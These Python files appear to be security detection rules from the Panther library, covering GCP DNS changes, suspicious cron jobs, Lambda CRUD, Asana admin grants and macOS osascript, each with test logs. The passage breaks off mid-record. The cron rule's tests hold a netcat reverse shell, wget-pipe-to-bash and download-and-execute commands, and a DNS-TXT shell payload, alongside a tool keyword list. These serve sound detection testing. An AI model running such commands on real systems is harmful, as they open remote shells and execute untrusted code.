                    {"granted": True, "permission": "dns.managedZones.update", "resourceAttributes": {}},
                ],
                "methodName": "dns.managedZones.patch",
                "request": {
                    "@type": "type.googleapis.com/cloud.dns.api.ManagedZonesPatchRequest",
                    "managedZone": "test-zone",
                    "managedZoneResource": {
                        "description": "testing",
                        "privateVisibilityConfig": {
                            "networks": [
                                {
                                    "networkUrl": "https://www.googleapis.com/compute/v1/projects/test-project-123456/global/networks/default",
                                },
                            ],
                        },
                    },
                    "project": "test-project-123456",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:07:25.568071Z"},
                },
                "resourceName": "managedZones/test-zone",
                "response": {
                    "@type": "type.googleapis.com/cloud.dns.api.ManagedZonesPatchResponse",
                    "managedZone": {
                        "cloudLoggingConfig": {},
                        "creationTime": "2023-05-23T18:59:57.919Z",
                        "description": "testing",
                        "dnsName": "test.detectiontesting.com.",
                        "fingerprint": "3f961d0b0a9e6a8c000001884a024eed",
                        "id": "4581881604156058252",
                        "name": "test-zone",
                        "nameServers": ["ns-gcp-private.googledomains.com."],
                        "privateVisibilityConfig": {
                            "networks": [
                                {
                                    "networkUrl": "https://www.googleapis.com/compute/v1/projects/test-project-123456/global/networks/default",
                                },
                            ],
                        },
                        "rrsetCount": 2,
                        "visibility": "PRIVATE",
                    },
                    "operation": {
                        "id": "a7513a2c-e637-4b86-b223-1c4f8b0797be",
                        "startTime": "2023-05-23T19:07:25.511Z",
                        "status": "DONE",
                        "type": "UPDATE",
                        "user": "user@domain.com",
                        "zoneContext": {
                            "newValue": {
                                "cloudLoggingConfig": {},
                                "creationTime": "2023-05-23T18:59:57.919Z",
                                "description": "testing",
                                "dnsName": "test.detectiontesting.com.",
                                "fingerprint": "3f961d0b0a9e6a8c000001884a024eed",
                                "id": "4581881604156058252",
                                "name": "test-zone",
                                "nameServers": ["ns-gcp-private.googledomains.com."],
                                "privateVisibilityConfig": {
                                    "networks": [
                                        {
                                            "networkUrl": "https://www.googleapis.com/compute/v1/projects/test-project-123456/global/networks/default",
                                        },
                                    ],
                                },
                                "rrsetCount": 2,
                                "visibility": "PRIVATE",
                            },
                            "oldValue": {
                                "cloudLoggingConfig": {},
                                "creationTime": "2023-05-23T18:59:57.919Z",
                                "description": "testing",
                                "dnsName": "test.detectiontesting.com.",
                                "fingerprint": "3f961d0b0a9e6a8c0000018849fb7b5f",
                                "id": "4581881604156058252",
                                "name": "test-zone",
                                "nameServers": ["ns-gcp-private.googledomains.com."],
                                "rrsetCount": 2,
                                "visibility": "PRIVATE",
                            },
                        },
                    },
                },
                "serviceName": "dns.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:07:26.276",
            "resource": {
                "labels": {"location": "global", "project_id": "test-project-123456", "zone_name": "test-zone"},
                "type": "dns_managed_zone",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:07:25.282",
        },
    ),
    RuleTest(
        name="dns.managedZones.update-should-alert",
        expected_result=True,
        log={
            "insertid": "xxxxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [{"granted": True, "permission": "dns.changes.create", "resourceAttributes": {}}],
                "methodName": "dns.changes.create",
                "request": {
                    "@type": "type.googleapis.com/cloud.dns.api.ChangesCreateRequest",
                    "change": {
                        "additions": [
                            {
                                "name": "test.detectiontesting.com.",
                                "rrdata": [
                                    "ns-gcp-private.googledomains.com. cloud-dns-hostmaster.google.com. 1 21600 3600 259200 300",
                                ],
                                "ttl": 3600,
                                "type": "SOA",
                            },
                        ],
                        "deletions": [
                            {
                                "name": "test.detectiontesting.com.",
                                "rrdata": [
                                    "ns-gcp-private.googledomains.com. cloud-dns-hostmaster.google.com. 1 21600 3600 259200 300",
                                ],
                                "ttl": 21600,
                                "type": "SOA",
                            },
                        ],
                    },
                    "managedZone": "test-zone",
                    "project": "test-project-123456",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:07:39.239275Z"},
                },
                "resourceName": "managedZones/test-zone",
                "response": {
                    "@type": "type.googleapis.com/cloud.dns.api.ChangesCreateResponse",
                    "change": {
                        "additions": [
                            {
                                "name": "test.detectiontesting.com.",
                                "rrdata": [
                                    "ns-gcp-private.googledomains.com. cloud-dns-hostmaster.google.com. 1 21600 3600 259200 300",
                                ],
                                "ttl": 3600,
                                "type": "SOA",
                            },
                        ],
                        "deletions": [
                            {
                                "name": "test.detectiontesting.com.",
                                "rrdata": [
                                    "ns-gcp-private.googledomains.com. cloud-dns-hostmaster.google.com. 1 21600 3600 259200 300",
                                ],
                                "ttl": 21600,
                                "type": "SOA",
                            },
                        ],
                        "id": "1",
                        "startTime": "2023-05-23T19:07:39.155Z",
                        "status": "PENDING",
                    },
                },
                "serviceName": "dns.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:07:40.053",
            "resource": {
                "labels": {"location": "global", "project_id": "test-project-123456", "zone_name": "test-zone"},
                "type": "dns_managed_zone",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:07:39.132",
        },
    ),
    RuleTest(
        name="dns.managedZones.get-should-not-alert",
        expected_result=False,
        log={
            "insertid": "-nkgd1se1zsiw",
            "logName": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "staging@pantherstaging.io"},
                "authorizationInfo": [
                    {"granted": True, "permission": "dns.managedZones.get", "resourceAttributes": {}},
                ],
                "methodName": "dns.managedZones.get",
                "request": {
                    "@type": "type.googleapis.com/cloud.dns.api.ManagedZonesGetRequest",
                    "managedZone": "test-zone",
                    "project": "test-project-123456",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:08:13.820007Z"},
                },
                "resourceName": "managedZones/test-zone",
                "response": {"@type": "type.googleapis.com/cloud.dns.api.ManagedZonesGetResponse"},
                "serviceName": "dns.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:08:14.305",
            "resource": {
                "labels": {"location": "global", "project_id": "test-project-123456", "zone_name": "test-zone"},
                "type": "dns_managed_zone",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:08:11.697",
        },
    ),
]


@panther_managed
class GCPDNSZoneModifiedorDeleted(Rule):
    default_description = "Detection for GCP DNS zones that are deleted, patched, or updated."
    display_name = "GCP DNS Zone Modified or Deleted"
    default_runbook = "Verify that this modification or deletion was expected. These operations are high-impact events and can result in downtimes or total outages."
    default_reference = "https://cloud.google.com/dns/docs/zones"
    default_severity = Severity.LOW
    log_types = [LogType.GCP_AUDIT_LOG]
    id = "GCP.DNS.Zone.Modified.or.Deleted-prototype"
    tests = gcpdns_zone_modifiedor_deleted_tests

    def rule(self, event):
        methods = ("dns.changes.create", "dns.managedZones.delete", "dns.managedZones.patch", "dns.managedZones.update")
        return deep_get(event, "protoPayload", "methodName", default="") in methods

    def title(self, event):
        actor = deep_get(event, "protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        resource = deep_get(event, "protoPayload", "resourceName", default="<RESOURCE_NOT_FOUND>")
        return f"[GCP]: [{actor}] modified managed DNS zone [{resource}]"

    def alert_context(self, event):
        return gcp_alert_context(event)



import shlex
from fnmatch import fnmatch

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

osquery_suspicious_cron_tests: list[RuleTest] = [
    RuleTest(
        name="Netcat Listener",
        expected_result=True,
        log={
            "name": "pack_incident-response_crontab",
            "hostIdentifier": "test-host",
            "action": "added",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "nc -e /bin/bash 237.233.242.58 80",
                "path": "/etc/crontab",
            },
        },
    ),
    RuleTest(
        name="Wget Pipe Bash",
        expected_result=True,
        log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "wget -qO- -U- https://sd9fd8f9d8fe.io/i.sh|bash >/dev/null 2>&1",
                "path": "/etc/crontab",
            },
        },
    ),
    RuleTest(
        name="Wget Execute",
        expected_result=True,
        log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "wget -O /tmp/load.sh http://test[.]io/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log",
                "path": "/etc/crontab",
            },
        },
    ),
    RuleTest(
        name="Dig",
        expected_result=True,
        log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": '/bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"',
                "path": "/etc/crontab",
            },
        },
    ),
    RuleTest(
        name="Built-in Cron",
        expected_result=False,
        log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "root cd / && run-parts --report /etc/cron.hourly",
                "path": "/etc/crontab",
            },
        },
    ),
    RuleTest(
        name="Command with quotes",
        expected_result=False,
        log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "runit 'go fast'",
                "path": "/etc/crontab",
            },
        },
    ),
]


@panther_managed
class OsquerySuspiciousCron(Rule):
    id = "Osquery.SuspiciousCron-prototype"
    display_name = "Suspicious cron detected"
    log_types = [LogType.OSQUERY_DIFFERENTIAL]
    tags = ["Osquery", "Execution:Scheduled Task/Job"]
    reports = {"MITRE ATT&CK": ["TA0002:T1053"]}
    default_severity = Severity.HIGH
    default_description = "A suspicious cron has been added"
    default_runbook = "Analyze the command to ensure no nefarious activity is occurring"
    default_reference = "https://en.wikipedia.org/wiki/Cron"
    summary_attributes = ["action", "hostIdentifier", "name"]
    tests = osquery_suspicious_cron_tests
    # Running in unexpected locations
    # nosec
    # Reaching out to the internet
    SUSPICIOUS_CRON_CMD_ARGS = {"/tmp/*", "curl", "dig", "http?://*", "nc", "wget"}
    # Passing arguments into /bin/sh
    SUSPICIOUS_CRON_CMDS = {"*|*sh", "*sh -c *"}

    def suspicious_cmd_pairs(self, command):
        return any(fnmatch(command, c) for c in self.SUSPICIOUS_CRON_CMDS)

    def suspicious_cmd_args(self, command):
        command_args = shlex.split(command.replace("'", "\\'"))  # escape single quotes
        for cmd in command_args:
            if any(fnmatch(cmd, c) for c in self.SUSPICIOUS_CRON_CMD_ARGS):
                return True
        return False

    def rule(self, event):
        if "crontab" not in event.get("name"):
            return False
        command = deep_get(event, "columns", "command")
        if not command:
            return False
        return any([self.suspicious_cmd_args(command), self.suspicious_cmd_pairs(command)])

    def title(self, event):
        return f"Suspicious cron found on [{event.get('hostIdentifier', '<UNKNOWN_HOST>')}]"



"""Used to define global helpers and variables for Box events."""

import base64
import json
import logging
import os
from datetime import datetime, timedelta

import boto3

try:
    # boxsdk will only be available if `boxapi[jwt]` is
    #   in the pip env
    from boxsdk import Client, JWTAuth
    from boxsdk.exception import BoxAPIException
except ImportError:
    Client = None
    JWTAuth = None
    BoxAPIException = Exception

# Name for BOX secrets in AWS Secrets Manager
BOX_API_ACCESS_NAME = "panther-analysis/box_api_access"

# The following keys and associated values
#   should be stored in AWS Secrets Manager
BOX_CLIENT_ID = "BOX_CLIENT_ID"
BOX_CLIENT_SECRET = "BOX_CLIENT_SECRET"  # nosec
BOX_JWT_PRIVATE_KEY = "BOX_JWT_PRIVATE_KEY"
BOX_JWT_PUB_KEY_ID = "BOX_JWT_PUB_KEY_ID"
BOX_ENTERPRISE_ID = "BOX_ENTERPRISE_ID"
BOX_JWT_KEY_PASSPHRASE = "BOX_JWT_KEY_PASSPHRASE"  # nosec

# Used to cache client connection to BOX API
BOX_CLIENT = None

# Cache credentials for 60 minutes at most
#  (the default box access token lifetime)
BOX_ACCESS_AGE = None
MAX_BOX_ACCESS_AGE = 60

# prevent INFO logs from going into the rules engine cloudtrail
logging.getLogger("boxsdk").setLevel(logging.CRITICAL)


class BadBoxLookup(Exception):
    """Error returned when a box item lookup fails."""


class BadSecretsLookup(Exception):
    """Error returned when an AWS Secrets Manager lookup fails."""


def is_box_sdk_enabled() -> bool:
    return Client and JWTAuth


def lookup_box_file(user_id: str, file_id: str) -> dict:
    try:
        client = get_box_client()
        user = client.user(user_id=user_id)
        file_info = client.as_user(user).file(file_id=file_id).get()
        return file_info
    except BoxAPIException as box_err:
        raise BadBoxLookup("Exception looking up file info.") from box_err


def lookup_box_folder(user_id: str, folder_id: str) -> dict:
    try:
        client = get_box_client()
        user = client.user(user_id=user_id)
        folder = client.as_user(user).folder(folder_id=folder_id).get()
        return folder
    except BoxAPIException as box_err:
        raise BadBoxLookup("Exception looking up folder info.") from box_err


def get_box_client() -> Client:
    # pylint: disable=global-statement
    global BOX_ACCESS_AGE
    global BOX_CLIENT

    fips_enabled = os.getenv("ENABLE_FIPS", "").lower() == "true"
    fips_suffix = "-fips." + os.getenv("AWS_REGION", "") + ".amazonaws.com"

    if not Client or not JWTAuth:
        # pylint: disable=broad-exception-raised
        raise Exception("Could not import necessary Box Library.")
    if (
        BOX_CLIENT is not None
        and BOX_ACCESS_AGE is not None
        and datetime.now() - BOX_ACCESS_AGE < timedelta(minutes=MAX_BOX_ACCESS_AGE)
    ):
        return BOX_CLIENT
    response = boto3.client(
        "secretsmanager",
        endpoint_url="https://secretsmanager" + fips_suffix if fips_enabled else None,
    ).get_secret_value(SecretId=BOX_API_ACCESS_NAME)
    settings = build_jwt_settings(response)
    BOX_CLIENT = Client(JWTAuth.from_settings_dictionary(settings))
    BOX_ACCESS_AGE = datetime.now()
    return BOX_CLIENT


def build_jwt_settings(response: dict) -> dict:
    data = None
    if "SecretString" in response:
        data = response.get("SecretString")
    else:
        data = base64.b64decode(response.get("SecretBinary", "{}"))
    # convert str from aws secrets mgr to json
    data = json.loads(data)
    # check that all necessary secrets are configured
    expected_keys = {
        BOX_CLIENT_ID,
        BOX_CLIENT_SECRET,
        BOX_JWT_PRIVATE_KEY,
        BOX_JWT_PUB_KEY_ID,
        BOX_ENTERPRISE_ID,
        BOX_JWT_KEY_PASSPHRASE,
    }
    missing_keys = expected_keys - set(data.keys())
    if len(missing_keys) != 0:
        raise BadSecretsLookup(f"Missing necessary secret(s): {missing_keys}")
    # build box jwt settings from gathered secrets
    settings = {
        "boxAppSettings": {
            "clientID": data.get(BOX_CLIENT_ID),
            "clientSecret": data.get(BOX_CLIENT_SECRET),
            "appAuth": {
                "publicKeyID": data.get(BOX_JWT_PUB_KEY_ID),
                # handling of escaped newlines when dealing with
                #   secrets mgr -> str -> json.loads()
                "privateKey": data.get(BOX_JWT_PRIVATE_KEY).replace("\\n", "\n"),
                "passphrase": data.get(BOX_JWT_KEY_PASSPHRASE),
            },
        },
        "enterpriseID": data[BOX_ENTERPRISE_ID],
    }
    return settings



from fnmatch import fnmatch

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context, deep_get

awslambdacrud_tests: list[RuleTest] = [
    RuleTest(
        name="Lambda DeleteFunction Unauthorized Account",
        expected_result=True,
        log={
            "eventVersion": "1.03",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "A1B2C3D4E5F6G7EXAMPLE",
                "arn": "arn:aws:iam::999999999999:user/myUserName",
                "accountId": "999999999999",
                "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
                "userName": "myUserName",
            },
            "eventTime": "2015-03-18T19:04:42Z",
            "eventSource": "lambda.amazonaws.com",
            "eventName": "DeleteFunction",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "127.0.0.1",
            "userAgent": "Python-httplib2/0.8 (gzip)",
            "requestParameters": {"functionName": "basic-node-task"},
            "responseElements": None,
            "requestID": "a2198ecc-cda1-11e4-aaa2-e356da31e4ff",
            "eventID": "20b84ce5-730f-482e-b2b2-e8fcc87ceb22",
            "eventType": "AwsApiCall",
            "recipientAccountId": "999999999999",
        },
    ),
    RuleTest(
        name="Lambda DeleteFunction Unauthorized User",
        expected_result=True,
        log={
            "eventVersion": "1.03",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "A1B2C3D4E5F6G7EXAMPLE",
                "arn": "arn:aws:iam::123456789012:user/myUserName",
                "accountId": "123456789012",
                "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
                "userName": "myUserName",
            },
            "eventTime": "2015-03-18T19:04:42Z",
            "eventSource": "lambda.amazonaws.com",
            "eventName": "DeleteFunction",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "127.0.0.1",
            "userAgent": "Python-httplib2/0.8 (gzip)",
            "requestParameters": {"functionName": "basic-node-task"},
            "responseElements": None,
            "requestID": "a2198ecc-cda1-11e4-aaa2-e356da31e4ff",
            "eventID": "20b84ce5-730f-482e-b2b2-e8fcc87ceb22",
            "eventType": "AwsApiCall",
            "recipientAccountId": "123456789012",
        },
    ),
    RuleTest(
        name="Lambda DeleteFunction Authorized Account",
        expected_result=False,
        log={
            "eventVersion": "1.03",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "A1B2C3D4E5F6G7EXAMPLE",
                "arn": "arn:aws:iam::123456789012:user/DeployRole",
                "accountId": "123456789012",
                "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
                "userName": "myUserName",
            },
            "eventTime": "2015-03-18T19:04:42Z",
            "eventSource": "lambda.amazonaws.com",
            "eventName": "DeleteFunction",
            "awsRegion": "us-west-1",
            "sourceIPAddress": "127.0.0.1",
            "userAgent": "Python-httplib2/0.8 (gzip)",
            "requestParameters": {"functionName": "basic-node-task"},
            "responseElements": None,
            "requestID": "a2198ecc-cda1-11e4-aaa2-e356da31e4ff",
            "eventID": "20b84ce5-730f-482e-b2b2-e8fcc87ceb22",
            "eventType": "AwsApiCall",
            "recipientAccountId": "123456789012",
        },
    ),
]


@panther_managed
class AWSLAMBDACRUD(Rule):
    id = "AWS.LAMBDA.CRUD-prototype"
    display_name = "Lambda CRUD Actions"
    enabled = False
    log_types = [LogType.AWS_CLOUDTRAIL]
    tags = ["AWS", "Security Control", "Configuration Required"]
    reports = {"CIS": ["3.12"], "MITRE ATT&CK": ["TA0005:T1525"]}
    default_severity = Severity.HIGH
    default_description = "Unauthorized lambda Create, Read, Update, or Delete event occurred."
    default_runbook = "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
    default_reference = "https://docs.aws.amazon.com/lambda/latest/dg/logging-using-cloudtrail.html"
    summary_attributes = ["eventSource", "eventName", "recipientAccountId", "awsRegion", "p_any_aws_arns"]
    tests = awslambdacrud_tests
    LAMBDA_CRUD_EVENTS = {
        "AddPermission",
        "CreateAlias",
        "CreateEventSourceMapping",
        "CreateFunction",
        "DeleteAlias",
        "DeleteEventSourceMapping",
        "DeleteFunction",
        "PublishVersion",
        "RemovePermission",
        "UpdateAlias",
        "UpdateEventSourceMapping",
        "UpdateFunctionCode",
        "UpdateFunctionConfiguration",
    }
    ALLOWED_ROLES = ["*DeployRole"]

    def rule(self, event):
        if event.get("eventSource") == "lambda.amazonaws.com" and event.get("eventName") in self.LAMBDA_CRUD_EVENTS:
            for role in self.ALLOWED_ROLES:
                if fnmatch(deep_get(event, "userIdentity", "arn", default="unknown-arn"), role):
                    return False
            return True
        return False

    def title(self, event):
        return f"[{deep_get(event, 'userIdentity', 'arn', default='unknown-arn')}] performed Lambda [{event.get('eventName')}] in [{event.get('recipientAccountId')} {event.get('awsRegion')}]."

    def dedup(self, event):
        return f"{deep_get(event, 'userIdentity', 'arn', default='unknown-arn')}"

    def alert_context(self, event):
        return aws_rule_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_asana_helpers import asana_alert_context
from pypanther.helpers.panther_base_helpers import deep_get

asana_workspace_new_admin_tests: list[RuleTest] = [
    RuleTest(
        name="Team made public",
        expected_result=False,
        log={
            "actor": {
                "actor_type": "user",
                "email": "homer.simpson@panther.io",
                "gid": "12345",
                "name": "Homer Simpson",
            },
            "context": {
                "client_ip_address": "12.12.12.12",
                "context_type": "web",
                "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
            },
            "created_at": "2022-12-16 19:35:21.026",
            "details": {"new_value": "public"},
            "event_category": "access_control",
            "event_type": "team_privacy_settings_changed",
            "gid": "12345",
            "resource": {"gid": "12345", "name": "Example Team Name", "resource_type": "team"},
            "p_log_type": "Asana.Audit",
        },
    ),
    RuleTest(
        name="New Workspace Admin",
        expected_result=True,
        log={
            "p_log_type": "Asana.Audit",
            "actor": {
                "actor_type": "user",
                "email": "homer.simpson@example.io",
                "gid": "1234",
                "name": "Homer Simpson",
            },
            "context": {
                "client_ip_address": "12.12.12.12",
                "context_type": "web",
                "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
            },
            "created_at": "2022-12-16 19:32:22.377",
            "details": {
                "group": {"gid": "1234", "name": "Workspace Name", "resource_type": "workspace"},
                "new_value": "domain_admin",
                "old_value": "member",
            },
            "event_category": "roles",
            "event_type": "user_workspace_admin_role_changed",
            "gid": "1234",
            "resource": {"email": "target@example.io", "gid": "1234", "name": "Bart Simpson", "resource_type": "user"},
        },
    ),
]


@panther_managed
class AsanaWorkspaceNewAdmin(Rule):
    default_description = "Admin role was granted to the user who previously did not have admin permissions"
    display_name = "Asana Workspace New Admin"
    default_reference = "https://help.asana.com/hc/en-us/articles/14141552580635-Admin-and-super-admin-roles-in-Asana"
    default_severity = Severity.HIGH
    log_types = [LogType.ASANA_AUDIT]
    id = "Asana.Workspace.New.Admin-prototype"
    tests = asana_workspace_new_admin_tests

    def rule(self, event):
        new = deep_get(event, "details", "new_value", default="")
        old = deep_get(event, "details", "old_value", default="")
        return all([event.get("event_type") == "user_workspace_admin_role_changed", "admin" in new, "admin" not in old])

    def title(self, event):
        a_c = asana_alert_context(event)
        w_s = deep_get(event, "details", "group", "name", default="<WS_NAME_NOT_FOUND>")
        return (
            f"Asana user [{a_c.get('resource_name')}] was made an admin in workspace [{w_s}] by [{a_c.get('actor')}]."
        )

    def alert_context(self, event):
        return asana_alert_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import crowdstrike_process_alert_context

crowdstrike_macos_osascript_administrator_tests: list[RuleTest] = [
    RuleTest(
        name="Ran Osascript with administrator privileges",
        expected_result=True,
        log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": ["1234abcdefghijklmnop", "5a29b1ee210395604829dafd744a8039", "abcde098654321xyz"],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    RuleTest(
        name="Ran Osascript without administrator privileges",
        expected_result=False,
        log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": ["1234abcdefghijklmnop", "5a29b1ee210395604829dafd744a8039", "abcde098654321xyz"],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    RuleTest(
        name="Windows",
        expected_result=False,
        log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
